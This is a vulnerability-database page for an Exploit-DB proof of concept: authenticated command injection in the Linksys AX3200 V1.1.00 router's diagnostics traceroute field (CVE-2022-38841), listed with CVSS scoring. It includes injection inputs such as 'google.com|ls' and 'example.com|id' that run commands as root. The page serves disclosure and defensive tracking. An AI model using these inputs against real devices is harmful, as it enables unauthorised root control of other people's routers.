Lucene search
Ahmed AlrokyEDB-ID:51035HistoryMar 22, 2023 - 12:00 a.m.
Linksys AX3200 V1.1.00 - Command Injection
2023-03-2200:00:00
Ahmed Alroky
www.exploit-db.com
86
linksys ax3200 v1.1.00
command injection
authentication required
cve-2022-38841
windows
diagnostics page
traceroute
root user
CVSS3
8.8
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
AI Score
8.9
Confidence
High
EPSS
0.013
Percentile
86.2%
# Exploit Title: Linksys AX3200 V1.1.00 - Command Injection
# Date: 2022-09-19
# Exploit Author: Ahmed Alroky
# Author: Linksys
# Version: 1.1.00
# Authentication Required: YES
# CVE : CVE-2022-38841
# Tested on: Windows
# Proof Of Concept:
1 - login into AX3200 webui
2 - go to diagnostics page
3 - put "google.com|ls" to perform a traceroute
4 - you will get the file list and also you can try "example.com|id" to ensure that all commands executed as a root userRelated
nvd
nvd
CVE-2022-38841
2023-04-16 02:15:08
zdt
zdt
Linksys AX3200 V1.1.00 - Command Injection Vulnerability
2023-03-22 00:00:00
cve
cve
CVE-2022-38841
2023-04-16 02:15:08
prion
prion
Command injection
2023-04-16 02:15:00
cvelist
cvelist
CVE-2022-38841
2023-04-16 00:00:00
packetstorm
packetstorm
Linksys AX3200 1.1.00 Command Injection
2023-03-24 00:00:00
CVSS3
8.8
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
AI Score
8.9
Confidence
High
EPSS
0.013
Percentile
86.2%
Related for EDB-ID:51035